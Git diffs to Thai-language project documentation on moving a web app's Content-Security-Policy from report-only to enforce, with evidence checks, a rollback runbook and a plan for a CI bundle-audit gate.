+    ตอนบันทึกรอบนี้ยังไม่เคยถูกยืนยันด้วยตา เพราะ session นั้นเข้าถึง Render log ไม่ได้
+    — **ยืนยันแล้วเมื่อ 21 ส.ค. 2026** ด้วย marker `csp-selftest-20260821-2d81.invalid`
+    (ดู Evidence check 2026-08-21 ด้านล่าง)
   - **ข้อควรระวังที่ยังทำให้ "log ว่าง" ตีความไม่ได้ 100%:** POST นัดแรก timeout ที่ 30 วินาที
     ต้อง warm up ด้วย `GET /api/readyz` (ตอบ 200 ใน 1.1s) ก่อนจึงยิงผ่าน — ตอนนั้นสรุปสาเหตุ
     ไม่ได้ระหว่าง network hiccup ของ gateway (เคยเจอ 16 ส.ค.) กับ cold start
@@ -168,7 +170,9 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
       `csp-selftest.invalid` (17 ส.ค. ~14:45 UTC, ยิงด้วยมือ) ·
       `csp-selftest-20260818.invalid` (18 ส.ค. 05:00 UTC) ·
       `csp-selftest-20260818-ecc9.invalid` (18 ส.ค. 05:10 UTC) — สองตัวหลังคือรอบ validate
-      สคริปต์กับ production ทั้งคู่ได้ 204 และ **จะหลุด retention ~7 วันพอดีช่วง 24–25 ส.ค.**
+      สคริปต์กับ production ทั้งคู่ได้ 204 และ **จะหลุด retention ~7 วันพอดีช่วง 24–25 ส.ค.** ·
+      `csp-selftest-20260821-2d81.invalid` (21 ส.ค. 06:08:55 UTC) — ตัวนี้ **เห็นใน Render log
+      ด้วยตาแล้ว** จึงเป็นตัวแรกที่ยืนยัน hop สุดท้ายของ pipeline ได้จริง (ดู Evidence check ด้านล่าง)
 
     **decision rule: เจอ marker สด → pipeline ครบวงจร ตัด marker ทิ้งแล้วดูที่เหลือ;
     ไม่เจอ marker → สรุปไม่ได้ ห้าม enforce**
@@ -212,6 +216,45 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   | `script-src 'self'` | ไม่มี inline `<script>` / `eval(` / `new Function(` / `new Worker` |
   | `style-src` + `font-src` | external มีแค่ `fonts.googleapis.com` + `fonts.gstatic.com`; CSS bundle ไม่มี `url()` และ build ไม่มีไฟล์ font local |
   | `img-src 'self' data:` | blob URL ตัวเดียวในโค้ดคือ `OcrPage.vue` (`URL.createObjectURL`) ซึ่งใช้กับ `<a download>` = download ไม่ใช่ subresource จึงไม่อยู่ใต้ directive ใดเลย |
+
+### Evidence check 2026-08-21 — ห้าวันหลัง baseline
+
+รอบนี้เก็บหลักฐานที่ baseline ยังทำไม่ได้ (โดยเฉพาะ **hop สุดท้ายของ pipeline ที่ 17 ส.ค.
+ยังไม่เคยถูกยืนยันด้วยตา**) และปิดข้อสงสัยว่า "log ว่าง" แปลว่าอะไรกันแน่
+
+| หลักฐาน | ผล | วิธีได้มา |
+|---|---|---|
+| bundle **ที่ production เสิร์ฟจริง** | **PASS 70 ไฟล์** | ดึง 69 chunk + `index.html` จาก production ลง temp dir แล้วรัน `node scripts/audit-bundle-csp.mjs --dist <tmp>` |
+| pipeline `POST /api/csp-report` | **ทำงานครบสาย** | `csp-report-selftest.mjs` ยิง marker `csp-selftest-20260821-2d81.invalid` เวลา 06:08:55 UTC แล้ว **เห็นบรรทัดนั้นใน Render log จริง** — ปิดช่องว่างของ baseline ที่ยืนยันได้แค่ถึง HTTP 204 |
+| header บน production | **ครบ ยังเป็น report-only** | `node scripts/verify-live-headers.mjs` → PASS |
+| ทราฟฟิกผู้ใช้จริง | **18 จาก 22 เมนู** | Chrome 151 ยิง `/api/*` 25 ครั้ง ช่วง 09:48–09:49 UTC |
+| CSP violation จากผู้ใช้จริง | **ไม่มีเลยสักครั้ง** | ไม่มี `POST /csp-report` ในหน้าต่างเดียวกันนั้น |
+
+**สิ่งที่ยังไม่ยืนยัน และเป็นข้อสำคัญที่สุดที่เหลือ:** ยังไม่มีใครดูว่า **console ของ DevTools
+ขึ้นคำเตือน CSP หรือไม่** ระหว่างไล่เมนู · ข้อนี้สำคัญเพราะ `report-uri` เป็นของที่ browser
+ทยอยเลิกรองรับ — **ถ้า Chrome 151 ไม่ส่ง report แล้ว การที่ log ว่างจะไม่ได้แปลว่าไม่มี violation**
+ซึ่งเป็น false clean รูปแบบเดียวกับที่ gate ของ R2 ถูกไล่ปิดมาห้ารอบ
+console พิมพ์คำเตือนเสมอไม่ว่า `report-uri` จะทำงานหรือไม่ จึงเป็นหลักฐานที่เชื่อได้มากกว่า log
+
+**เมนูที่ยังไม่ได้ทดสอบ 4 หน้า:** Dashboard · การจัดการงาน (`/admin`) · นำเข้าข้อมูล (`/import`)
+· แปลงเอกสาร PDF (`/ocr`) — สองหน้าหลังผู้ใช้ลองแล้ว**ล้มเหลวทั้งคู่** โดย `/ocr` วินิจฉัยแล้วว่า
+ไม่เกี่ยวกับ CSP (ไม่มี OCR service ถูก deploy เลย — ดู issue #147) ส่วน `/import` ยังสรุปสาเหตุไม่ได้
+· **ยังไม่มี POST/PUT/DELETE เลยสักครั้ง** แปลว่ายังไม่ได้ลองเพิ่มหรือแก้ไขข้อมูลจริง
+
+**สามข้อที่ขัดกับความเข้าใจเดิม — เขียนไว้กันคนถัดไปสรุปผิดซ้ำ**
+
+1. **`frontend/dist` ในเครื่องเป็นคนละ build กับที่ production เสิร์ฟ** (hash ต่างกันทั้ง 3 ไฟล์ที่เทียบ)
+   `audit-bundle-csp.mjs` ที่รันใน CI จึงตรวจ build ของเครื่องที่รัน **ไม่ใช่ของที่ deploy** ซึ่งถูกต้อง
+   ตามหน้าที่ของมัน (เป็น pre-merge gate) — การตรวจ bundle ของ production เป็นคนละงานที่ต้องดึงไฟล์
+   จาก production มาก่อนแล้วรันด้วย `--dist` อย่างในตารางข้างบน
+2. **`last-modified` ของ `/` ขยับเป็น 20 ส.ค. แต่หน้าต่างหลักฐาน 7 วันไม่ได้รีเซ็ต** — production
+   ยังเสิร์ฟ `assets/index-B1YyXcfC.js` ซึ่งเป็นแฮชเดียวกับที่บันทึกไว้ 16–17 ส.ค. และไม่มีคอมมิต
+   แตะ `frontend/` เลยหลัง 17 ส.ค. · วันที่ขยับเพราะ backend merge ทำให้ re-deploy ทั้ง site
+   **อย่าด่วนสรุปจาก `last-modified` อย่างเดียว ต้องเทียบแฮชของ asset**
+3. **ตัวนับ CSP ใช้เป็นหลักฐานสำหรับรอบ 24 ส.ค. ไม่ได้** ต่อให้รัน DDL วันนี้ก็ตาม เพราะหน้าต่าง
+   เริ่มนับ 17 ส.ค. แต่ตัวนับเก็บได้เฉพาะตั้งแต่วันที่รัน DDL และ `check-csp-violations.mjs`
+   ถูกออกแบบให้ตอบ ✗ เมื่อตัวนับครอบไม่ถึงต้นหน้าต่าง (finding I3) — **มันจะไม่ยอมให้ผ่านโดยตั้งใจ**
+   หลักฐานสำหรับรอบนั้นต้องมาจาก Render log · ตัวนับมีค่าในฐานะ **ตาข่ายรองรับหลัง enforce** แทน
 
 **ความเสี่ยงที่ต้องกันไว้ก่อน enforce (คนละเรื่องกับจำนวน violation ใน log):**
 

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -267,13 +267,16 @@ truth และ fail-closed เมื่อโครงสร้างเปล�
   · absolute URL ที่บอกบริบทไม่ได้ เทียบกับ allowlist รวม และรายงาน directive ที่เทียบตาม
   policy จริง · `url()` ภายนอกใน stylesheet **ทุกที่ที่เจอ ไม่ใช่เฉพาะไฟล์ `.css`** (`<style>` ใน HTML และ
   CSS-in-JS ก็โหลดจริง) **รวมรูป protocol-relative `url(//host/…)`** ซึ่ง browser เติม scheme
-  ของหน้าเว็บให้ · **ข้อจำกัดที่รู้ตัว**: `//host` จับเฉพาะที่มีบริบทบอกว่าเป็น URL (ใน `url()` หรือ
-  argument ของ fetch/XHR) สตริงลอย ๆ ไม่ถูกตรวจ เพราะไล่จับทุกที่แล้วชนโค้ดปกติ
+  ของหน้าเว็บให้ · เช่นเดียวกับ **ค่าของ attribute ที่เป็น URL** (`src` / `href` / `srcset` /
+  `poster` / `data` / `action` / `formaction`) — `<img src="//host">` คือบริบทที่บอกว่าเป็น URL
+  ชัดกว่า `url()` ด้วยซ้ำ · **ข้อจำกัดที่รู้ตัว**: `//host` จับเฉพาะสามบริบทนี้เท่านั้น
+  สตริงลอย ๆ ไม่ถูกตรวจ เพราะไล่จับทุกที่แล้วชนโค้ดปกติ (วัดกับ build จริงแล้วได้ `//i.test`
+  จาก regex literal ที่ bundler ลากมา)
   · **ไฟล์ font ใน bundle เมื่อ `font-src` ไม่มี `'self'`** (ความเสี่ยงข้อ 2
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (39 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (45 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
 - ตรวจจากภายนอกหลัง deploy:
   ```bash

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -330,6 +330,13 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
   · regression: `scripts/tests/audit-bundle-csp.test.mjs` (62 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
+  · **differential**: `scripts/tests/audit-bundle-csp.differential.test.mjs` — ไม่ระบุคำตอบที่ถูกเอง
+  แต่ถาม **แหล่งความจริงเดียวกับที่ browser ใช้** แล้วเทียบว่า gate เห็นตรงกันไหม: `parse5`
+  (HTML tokenizer ตาม spec) ตอบว่า markup มี attribute อะไรจริง · `new URL()` ตอบว่า URL นั้น
+  browser จะไปที่ origin ไหนจริง · มีไว้เพราะการไล่ปิดทีละรูปแพ้มาหกรอบ — รูปที่ยังไม่มีใคร
+  นึกถึงจึงถูกครอบอัตโนมัติ · ยืม`parse5` จาก `frontend/node_modules` และ **ข้ามตัวเองพร้อม
+  เหตุผลที่บอกวิธีแก้** เมื่อยังไม่ได้ `npm ci` ฝั่ง frontend (มีเทสบังคับว่าข้อความ skip ต้องอ่านออก)
+  — ในทางปฏิบัติได้รันจริงเสมอ เพราะ `pre-push` รัน vitest อยู่แล้วจึงต้องมี node_modules ครบ
 - ตรวจจากภายนอกหลัง deploy:
   ```bash
   curl -sI https://smart-port.onrender.com/ | grep -i "content-security\|x-frame\|referrer\|permissions\|strict-transport"

--- a/docs/runbooks/csp-enforce-switch.md
+++ b/docs/runbooks/csp-enforce-switch.md
@@ -1,0 +1,117 @@
+# Runbook: เปลี่ยน CSP จาก report-only เป็น enforce บน production
+
+**สำหรับ:** เจ้าของระบบที่มีสิทธิ์ Render dashboard · **เวลาที่ต้องใช้:** ~20 นาที รวมรอ deploy
+**ย้อนกลับได้:** ใช่ — คืนชื่อ header เดิมแล้ว deploy ใหม่ (ดูข้อ 6)
+
+เอกสารนี้เป็นขั้นตอนของ **วันกดสวิตช์** · เกณฑ์การตัดสินใจและหลักฐานอยู่ที่
+[`docs/frontend-security-headers.md`](../frontend-security-headers.md) หัวข้อ "CSP monitoring
+ก่อน enforce" และ "Evidence check" ทั้งสามรอบ
+
+---
+
+## ข้อ 0 — ตรวจก่อนว่าควรกดหรือยัง (5 นาที)
+
+| เกณฑ์ | สถานะ ณ 22 ส.ค. 2026 |
+|---|---|
+| Render log ไม่มี violation จากระบบจริง ≥ 7 วัน | ✅ ไม่พบเลยตั้งแต่ 17 ส.ค. — **ต้องดูซ้ำในวันกด** เพราะ log ขยับได้ |
+| pipeline ของ report ทำงานครบสาย | ✅ เห็น marker ใน Render log ด้วยตาแล้ว (21 ส.ค.) |
+| console ของ DevTools เงียบระหว่างใช้งานจริง | ✅ 19 หน้าบน Chrome 151 ไม่มี CSP warning สักครั้ง (22 ส.ค.) |
+| bundle ที่ production เสิร์ฟไม่มีอะไรชน policy | ✅ `audit-bundle-csp.mjs --dist <ไฟล์จาก production>` PASS |
+| write path (POST/PUT/DELETE) ผ่านโดยไม่มี violation | ✅ 5 นัด (22 ส.ค.) |
+| `img-src` ถูกใช้งานจริง | ❌ **ยังไม่เคย** — ทั้งระบบไม่มีรูปข้าราชการเลยสักใบ และ UI ไม่มีช่องอัปโหลด |
+| `/import` · `/ocr` ทดสอบด้วยไฟล์จริง | ❌ ทดสอบแค่เปิดหน้า (ทั้งคู่รอผู้ใช้เลือกไฟล์ก่อนจึงยิง request) |
+
+**สองข้อที่เป็น ❌ ไม่ใช่ตัวบล็อกโดยอัตโนมัติ** — แปลว่าเส้นทางนั้นยังไม่มีหลักฐาน ไม่ใช่ว่ามีปัญหา ·
+ถ้ากดสวิตช์ทั้งที่ยังไม่มีหลักฐาน ให้ถือว่า **วันแรกที่มีคนอัปโหลดรูปหรือ import ไฟล์คือวันทดสอบจริง**
+และเตรียมย้อนกลับไว้ (ข้อ 6) · ทางที่ปลอดภัยกว่าคือทดสอบสองเส้นทางนั้นก่อนกด
+
+**ยิง marker สดก่อนอ่าน log เสมอ** — Render retention ~7 วัน marker เก่าหลุดไปแล้ว:
+
+```bash
+node scripts/csp-report-selftest.mjs   # exit 1 = ยังไม่มี marker สด ห้ามข้ามไปอ่าน log
+```
+
+`exit 0` แปลว่า request ถึงปลายทางและได้ 204 เท่านั้น **ยังไม่ใช่หลักฐานว่า marker ถูก log** —
+ต้องเห็นบรรทัดนั้นใน Render log ด้วยตา แล้วจึงตีความ "log ว่าง" ได้
+
+---
+
+## ข้อ 1 — แก้ `render.yaml` (2 บรรทัด)
+
+```diff
+       - path: /*
+-        name: Content-Security-Policy-Report-Only
++        name: Content-Security-Policy
+         value: "default-src 'self'; script-src 'self'; …; report-uri /api/csp-report"
+```
+
+`report-uri` **เก็บไว้ต่อได้และควรเก็บ** — หลัง enforce มันจะรายงานสิ่งที่ถูกบล็อกจริง ซึ่งเป็น
+สัญญาณเตือนที่เร็วกว่าการรอผู้ใช้โทรมา
+
+## ข้อ 2 — แก้เทสที่ผูกกับชื่อ header
+
+`frontend/src/__tests__/securityHeaders.test.js:34` assert ว่า `render.yaml` มีคำว่า
+`Content-Security-Policy-Report-Only` — ต้องเปลี่ยนเป็นชื่อใหม่ ไม่งั้น vitest แดงตั้งแต่ pre-push
+(บรรทัด 68–69 และ 140 เป็นของ `nginx.conf` ซึ่ง**ไม่ต้องแตะ** เพราะ nginx ใช้ enforce อยู่แล้ว)
+
+```bash
+cd frontend && npx vitest run src/__tests__/securityHeaders.test.js
+```
+
+## ข้อ 3 — Deploy **แล้วยืนยันว่า header เปลี่ยนจริง** (ข้อสำคัญที่สุด)
+
+> **ความเสี่ยงที่วัดได้จริงเมื่อ 22 ส.ค.: blueprint บน Render ตามหลัง repo อยู่**
+>
+> `Cache-Control` ของ `/assets/*` บน live ยังเป็นกฎที่ถูก **ลบ** ออกจาก `render.yaml` ไปตั้งแต่
+> 17 ส.ค. (`c168000`) — วัดซ้ำ 20 request ได้ค่าเดิม deterministic ทั้งหมด · ขณะที่การ **แก้ค่า**
+> CSP (16 ส.ค.) propagate ปกติ
+>
+> การ enforce คือการ **ลบ** rule ชื่อเก่า **+ เพิ่ม** rule ชื่อใหม่ ซึ่งมีครึ่งหนึ่งเป็นการลบพอดี
+> **ห้ามถือว่า merge แล้วจบ** — ถ้าครึ่งนั้นไม่ propagate จะได้ทั้งสอง header พร้อมกัน (ยังทำงานได้
+> แต่สับสน) หรือแย่กว่านั้นคือ enforce ไม่ติดเลยทั้งที่ทุกคนเชื่อว่าติดแล้ว
+
+```bash
+node scripts/verify-live-headers.mjs        # ต้อง exit 0
+curl -sI https://smart-port.onrender.com/ | grep -i content-security-policy
+```
+
+ต้องเห็น `content-security-policy:` **และไม่เห็น** `content-security-policy-report-only:`
+ถ้ายังเห็นชื่อเก่าอยู่ → blueprint ไม่ได้ sync: Render Dashboard → Blueprint → **Sync** แล้ววัดใหม่
+
+**หมายเหตุเรื่อง gate**: `verify-live-headers.mjs` เทียบแบบ *directives* เฉพาะกับชื่อ
+`...-Report-Only` (บรรทัด 181) พอเปลี่ยนชื่อจะตกไปโหมด *exact* · วัดเมื่อ 22 ส.ค. แล้วว่า Render
+ส่งค่าตรงเป๊ะกับ `render.yaml` (286 ตัวอักษร ตรงทุกตัว) โหมด exact จึงควรผ่าน — **ถ้าวันนั้น
+gate fail ด้วยข้อความที่ไม่บอกว่าขาด directive ไหน นั่นคือสาเหตุ** ให้เทียบด้วย `curl` ข้างบน
+ก่อนสรุปว่า header ผิด
+
+## ข้อ 4 — เดินเมนูจริงพร้อมเปิด DevTools console (10 นาที)
+
+เส้นทางที่ต้องเดินอย่างน้อย: `/login` → `/dashboard` → `/personnel` (เปิด modal เพิ่ม/แก้) →
+`/settings/special-areas` → `/import` → `/ocr` → หน้าที่มีรูปถ้ามีข้อมูลรูปแล้ว
+
+**console ต้องเงียบ** · ถ้ามีบรรทัดขึ้นต้นว่า `Refused to …` ให้จดไว้ทั้งบรรทัด — บอกทั้ง directive
+ที่บล็อกและ URL ที่ถูกบล็อก ซึ่งพอสำหรับตัดสินว่าจะแก้ policy หรือแก้โค้ด
+
+## ข้อ 5 — บันทึกหลักฐาน
+
+เพิ่มหัวข้อ `### Enforce switch YYYY-MM-DD` ใน `docs/frontend-security-headers.md` ต่อจาก
+Evidence check ล่าสุด: header ที่วัดได้ · เมนูที่เดิน · console เงียบ/ไม่เงียบ · marker ที่ใช้
+**เขียนสิ่งที่ยังไม่ยืนยันให้เด่นเท่ากับสิ่งที่ยืนยันแล้ว** ตามแบบของ Evidence check รอบก่อน ๆ
+
+## ข้อ 6 — ย้อนกลับเมื่อพัง
+
+อาการที่ต้องย้อนทันที: หน้าใดหน้าหนึ่งใช้งานไม่ได้ · รูปหายทั้งระบบ · เรียก API ไม่ได้
+
+```diff
+-        name: Content-Security-Policy
++        name: Content-Security-Policy-Report-Only
+```
+
+deploy แล้ววัดด้วย `verify-live-headers.mjs` อีกครั้ง · ถ้า blueprint ไม่ sync ให้กด Sync
+เหมือนข้อ 3 · **การย้อนกลับไม่ทำให้ข้อมูลเสียหาย** เพราะ CSP คุมแค่ browser ไม่แตะฐานข้อมูล
+
+> ความเสี่ยงที่ต้องรู้ก่อนกด (จากเอกสารหลัก): ถ้ามีใครตั้ง `VITE_API_URL` เป็น absolute URL บน
+> dashboard หลัง enforce จะพังสองชั้นพร้อมกัน — `connect-src 'self'` บล็อก API call ทั้งหมด
+> **และ** `img-src 'self' data:` บล็อกรูปข้าราชการทุกใบ เพราะ `apiAssetUrl()` ประกอบ URL รูปจาก
+> API base เดียวกัน · คนที่แก้โดยเติม backend origin เข้า `connect-src` อย่างเดียวจะได้ API กลับมา
+> แต่รูปยังพังทั้งระบบ

--- a/docs/superpowers/plans/2026-08-19-csp-bundle-audit.md
+++ b/docs/superpowers/plans/2026-08-19-csp-bundle-audit.md
@@ -1,0 +1,77 @@
+# CSP Bundle Audit Gate — Implementation Plan (R2)
+
+> **For agentic workers:** ใช้ superpowers:subagent-driven-development หรือ executing-plans · steps ใช้ checkbox
+
+**Goal:** เปลี่ยน static audit ของ bundle จาก "ร้อยแก้วในเอกสารที่ครอบแค่ 6 จาก 65 chunk" เป็นสคริปต์ที่ตรวจ **ทุกไฟล์ใน build output** แล้ว fail ถ้าพบสิ่งที่จะชน CSP หลัง enforce
+
+**Architecture:** สคริปต์เดี่ยว `scripts/audit-bundle-csp.mjs` อ่าน CSP policy จาก `render.yaml` (single source of truth เดียวกับ `verify-live-headers.mjs` — reuse `parseRenderHeaders` ที่ export ไว้แล้ว) แล้วสแกน `frontend/dist` ทั้งโฟลเดอร์ ตรวจว่าไม่มีอะไรที่ policy จะบล็อก · ไม่ยิงเน็ต ไม่ต้องใช้ Docker → เสียบเป็น CI gate ได้จริง
+
+**Tech Stack:** Node 24 (`node:fs`, `node:test`) — ไม่มี dependency ใหม่
+
+**Spec:** ไม่มี spec แยก — ที่มาคือข้อเสนอ R2 ใน `project-log-md/claude-code/handoff-2026-08-18-csp-baseline-shipped.md` และหัวข้อ static audit ใน `docs/frontend-security-headers.md`
+
+## Global Constraints
+
+- **fail-closed ทุกกรณีที่ไม่รู้**: ไม่มี `frontend/dist` = fail (ไม่ใช่ skip) · parse policy ไม่ได้ = fail · เจอ origin ที่ไม่รู้จัก = fail
+- **allowlist ต้องมาจาก policy เป็นหลัก** — origin ที่ policy อนุญาตอยู่แล้ว (`fonts.googleapis.com`, `fonts.gstatic.com`) มาจากการ parse ไม่ใช่ hardcode · ข้อยกเว้นที่ hardcode ได้มีเฉพาะ URL ที่ **ไม่เคยถูก fetch** และต้องมีคอมเมนต์อธิบายเหตุผลรายตัว
+- ไม่ยิงเครือข่าย ไม่ใช้ Docker — ต้องรันได้บนเครื่องเปล่าที่มีแค่ `frontend/dist`
+- โค้ดคอมเมนต์ภาษาไทย ตามแบบ `scripts/verify-live-headers.mjs` / `scripts/csp-report-selftest.mjs`
+- ข้อความ error ต้องบอก **ไฟล์ + สิ่งที่เจอ + directive ไหนที่จะบล็อกมัน** ไม่ใช่แค่ "พบปัญหา"
+
+## ข้อเท็จจริงที่วัดจาก build ปัจจุบัน (2026-08-19)
+
+| สิ่งที่วัด | ค่า |
+|---|---|
+| JS chunk ใน `frontend/dist/assets/` | **65 ไฟล์** (เอกสารเดิมอ้างว่าตรวจ 6 จาก ~24) |
+| absolute URL ใน JS ทั้งหมด | **5 ตัว**: `http://www.w3.org` ×4 (XML/SVG namespace — ไม่ใช่การโหลด), `https://vuejs.org` ×1 (ลิงก์ในข้อความ error ของ Vue) |
+| `url(http...)` ใน CSS | **0** |
+| ไฟล์ font ใน dist | **0** — ยืนยันว่าความเสี่ยงเรื่อง `font-src` ที่ไม่มี `'self'` ยังไม่เกิดจริง |
+
+allowlist จึงเล็กและอธิบายได้ครบ — false positive แทบเป็นศูนย์
+
+---
+
+### Task 1: สคริปต์ audit + เทส
+
+**Files:**
+- Create: `scripts/audit-bundle-csp.mjs`
+- Create: `scripts/tests/audit-bundle-csp.test.mjs`
+
+**Interfaces:**
+- Consumes: `parseRenderHeaders(yaml)` ที่ `scripts/verify-live-headers.mjs` export ไว้แล้ว
+- Produces: `auditBundle(distDir, policy) -> {findings: Array<{file, rule, detail, directive}>}` · `parseCspPolicy(policyValue) -> Map<directive, string[]>` · CLI exit 0/1
+
+**กฎที่ต้องตรวจ (แต่ละข้อผูกกับ directive จริงใน policy):**
+
+| # | กฎ | directive ที่รองรับ | ทำไม |
+|---|---|---|---|
+| R1 | ไม่มี inline `<script>` ที่มีเนื้อหา และไม่มี inline event handler (`on*=`) ใน `.html` | `script-src` ที่ไม่มี `'unsafe-inline'` | inline script จะถูกบล็อกทันทีหลัง enforce |
+| R2 | ไม่มี `eval(` / `new Function(` ใน `.js` | `script-src` ที่ไม่มี `'unsafe-eval'` | เดียวกัน |
+| R3 | ทุก absolute URL ใน `.js`/`.css` ต้องอยู่ใน allowlist | `connect-src` / `img-src` / `style-src` / `font-src` | URL ที่ไม่ได้ประกาศจะถูกบล็อกตอน fetch |
+| R4 | ไม่มี `url(http...)` ใน `.css` ที่ origin ไม่อยู่ใน allowlist | `img-src` / `font-src` | เดียวกัน |
+| R5 | ไม่มีไฟล์ font ใน `dist` | `font-src` ที่ไม่มี `'self'` | **ความเสี่ยงที่เอกสารเตือนไว้ข้อ 2** — ย้ายมา self-host font เมื่อไรพังทันทีทั้งที่ดูเหมือนแค่เปลี่ยน asset |
+
+- [ ] **Step 1: เขียนเทสที่ยังไม่ผ่าน** — สร้าง `scripts/tests/audit-bundle-csp.test.mjs` ที่สร้าง fixture dist ชั่วคราวใน temp dir (ไม่แตะ `frontend/dist` จริง) แล้วครอบเคส: bundle สะอาด → 0 finding · inline script → finding ผูก `script-src` · `eval(` → finding · URL นอก allowlist → finding พร้อมชื่อ origin · URL ที่ policy อนุญาต (`fonts.gstatic.com`) → ไม่ finding · ไฟล์ `.woff2` → finding ผูก `font-src` · dist ไม่มีอยู่ → throw/exit 1 (ไม่ใช่ผ่านเงียบ)
+- [ ] **Step 2: รันเทสให้เห็นว่า fail** — `timeout 300 node --test scripts/tests/audit-bundle-csp.test.mjs` → `Cannot find module`
+- [ ] **Step 3: เขียนสคริปต์** ตามกฎ R1-R5 พร้อม allowlist ที่มีคอมเมนต์เหตุผลรายตัว (`www.w3.org` = XML namespace ไม่ใช่ URL ที่ถูกโหลด · `vuejs.org` = ลิงก์ในข้อความ error) และ fail-closed เมื่อ parse policy ไม่ได้/ไม่มี dist
+- [ ] **Step 4: รันเทสให้ผ่าน**
+- [ ] **Step 5: รันกับ bundle จริง** — `node scripts/audit-bundle-csp.mjs` ต้อง **exit 0** บน build ปัจจุบัน (ถ้าไม่ผ่าน แปลว่าเจอของจริงที่เอกสารเดิมมองไม่เห็น — รายงานก่อนแก้ อย่าผ่อนกฎเพื่อให้เขียว)
+- [ ] **Step 6: Commit**
+
+### Task 2: เสียบเป็น gate + อัปเดตเอกสาร
+
+**Files:**
+- Modify: `scripts/ci-local.sh` · `scripts/ci-local.ps1` (ต่อจากขั้น frontend build เพราะต้องมี `dist`)
+- Modify: `docs/frontend-security-headers.md` (§การทดสอบ + แทนที่ตาราง static audit แบบร้อยแก้ว)
+
+- [ ] **Step 1: เสียบเข้า ci-local ทั้งสองไฟล์** หลังบล็อก frontend build (ต้องรันหลัง `npm run build` เพราะอ่าน `dist`)
+- [ ] **Step 2: อัปเดต `docs/frontend-security-headers.md`** — เพิ่มรายการสคริปต์ใน §การทดสอบ และแก้ตาราง static audit ให้ระบุว่า **ตอนนี้ตรวจอัตโนมัติครบทุกไฟล์แล้ว** (เดิมเขียนว่าครอบ 6 จาก ~24 chunk) พร้อมคงข้อความความเสี่ยง 2 ข้อเดิมไว้ (`VITE_API_URL` แบบ absolute · `font-src` ที่ไม่มี `'self'`) และระบุว่าข้อหลังตอนนี้มี gate จับแล้ว
+- [ ] **Step 3: รัน gate ทั้งชุด** — `node scripts/validate-schema-parity.mjs` · `node --test scripts/tests/*.test.mjs` · `node scripts/audit-bundle-csp.mjs`
+- [ ] **Step 4: Commit**
+
+---
+
+## หลังจบ
+
+1. code review อิสระ (`superpowers:requesting-code-review`) — งานนี้ผู้เขียนแผนกับผู้ลงมือเป็นคนเดียวกัน จึงต้องมีตาที่สาม
+2. push + PR อ้าง issue #113

--- a/docs/superpowers/plans/2026-08-19-csp-bundle-audit.md
+++ b/docs/superpowers/plans/2026-08-19-csp-bundle-audit.md
@@ -14,6 +14,10 @@
 
 - **fail-closed ทุกกรณีที่ไม่รู้**: ไม่มี `frontend/dist` = fail (ไม่ใช่ skip) · parse policy ไม่ได้ = fail · เจอ origin ที่ไม่รู้จัก = fail
 - **allowlist ต้องมาจาก policy เป็นหลัก** — origin ที่ policy อนุญาตอยู่แล้ว (`fonts.googleapis.com`, `fonts.gstatic.com`) มาจากการ parse ไม่ใช่ hardcode · ข้อยกเว้นที่ hardcode ได้มีเฉพาะ URL ที่ **ไม่เคยถูก fetch** และต้องมีคอมเมนต์อธิบายเหตุผลรายตัว
+  - **ข้อยกเว้นชั้นที่สองที่เกิดขึ้นจริงระหว่างทาง**: `NON_BROWSER_FILES` ยกเว้นทั้ง**ไฟล์** ไม่ใช่แค่ URL
+    (`_redirects` = ไฟล์ตั้งค่าของ Render edge ที่ browser ไม่เคยโหลด แม้ข้างในจะมี URL ของ backend)
+    แผนเดิมไม่ได้เปิดช่องนี้ไว้ · อยู่ใต้กฎเดียวกับ `NON_FETCHED_ORIGINS` คือ **ต้องมีเหตุผลรายตัว
+    และถูกพิมพ์ออกทุกครั้งที่รัน** เพื่อไม่ให้ "ไม่ได้ตรวจ" ถูกนับเป็น "ตรวจแล้วสะอาด"
 - ไม่ยิงเครือข่าย ไม่ใช้ Docker — ต้องรันได้บนเครื่องเปล่าที่มีแค่ `frontend/dist`
 - โค้ดคอมเมนต์ภาษาไทย ตามแบบ `scripts/verify-live-headers.mjs` / `scripts/csp-report-selftest.mjs`
 - ข้อความ error ต้องบอก **ไฟล์ + สิ่งที่เจอ + directive ไหนที่จะบล็อกมัน** ไม่ใช่แค่ "พบปัญหา"
@@ -39,7 +43,11 @@ allowlist จึงเล็กและอธิบายได้ครบ —
 
 **Interfaces:**
 - Consumes: `parseRenderHeaders(yaml)` ที่ `scripts/verify-live-headers.mjs` export ไว้แล้ว
-- Produces: `auditBundle(distDir, policy) -> {findings: Array<{file, rule, detail, directive}>}` · `parseCspPolicy(policyValue) -> Map<directive, string[]>` · CLI exit 0/1
+- Produces: `auditBundle(distDir, cspValue) -> {findings: Array<{file, rule, detail, directive}>, inspected, skipped}` · `parseCspPolicy(policyValue) -> Map<directive, string[]>` · CLI exit 0/1
+  - รับ **CSP string ดิบ** แล้ว `parseCspPolicy` ข้างในเอง (แผนเดิมเขียน `policy` ที่ parse แล้ว) —
+    ผู้เรียกทุกทางมี string อยู่ในมือพอดี การให้ parse ข้างในทำให้ไม่มีสองสำเนาของ policy ที่เพี้ยนกันได้
+  - คืน `inspected` / `skipped` ด้วย เพราะ "ตรวจแล้วกี่ไฟล์ ข้ามกี่ไฟล์ เพราะอะไร" ต้องพิมพ์ทุกครั้ง
